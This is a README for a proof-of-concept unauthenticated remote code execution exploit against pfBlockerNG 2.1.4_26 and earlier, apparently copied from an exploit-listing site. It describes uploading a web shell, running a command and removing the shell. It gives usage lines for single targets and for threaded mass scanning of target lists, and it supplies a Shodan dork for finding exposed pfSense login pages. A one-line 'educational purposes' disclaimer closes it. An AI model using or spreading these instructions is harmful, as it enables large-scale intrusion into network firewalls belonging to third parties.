## https://sploitus.com/exploit?id=CCD5CAA5-6C3B-5F0E-BAD9-89B84D17AAFD
# pfBlockerNG <= 2.1.4_26 Unauth RCE
This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, uploads a shell, executes a command, and then deletes the shell.
## Requirements
This script requires Python 3.x and the requests and concurrent.futures modules to be installed. You can install these modules by running:
```bash
pip3 install requests concurrent.futures
```
or
```bash
pip3 install -r requirements.txt
```
## Usage
```bash
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Console Command ('id')
-l LIST, --list LIST List of targets (list.txt)
-i IP, --ip IP Base target uri (ex. http://target-uri/)
-t THREADS, --threads THREADS
Number of threads for mass scan
-o OUTPUT, --output OUTPUT
Output file (vuln.txt)
```
## Single Target
To exploit a single target, use the `-i` or `--ip` flag and specify the base URL or IP Address:
```bash
python3 exploit.py -i http://target-uri/ -c 'id'
```
## Multiple Targets
To scan a list of targets, use the `-l` or `--list` flag and specify the path to the list:
```bash
python3 exploit.py -l list.txt -c 'id' -t 50
```
The `-t` or `--threads` flag can be used to specify the number of threads to use for the scan.
## Output
If the `-o` or `--output` flag is specified, the list of vulnerable targets will be written to a file:
```
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
```
## Shodan Dork:
```bash
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
```
## โ ๏ธ Disclaimer
> This script is for educational purposes only. Use at your own risk.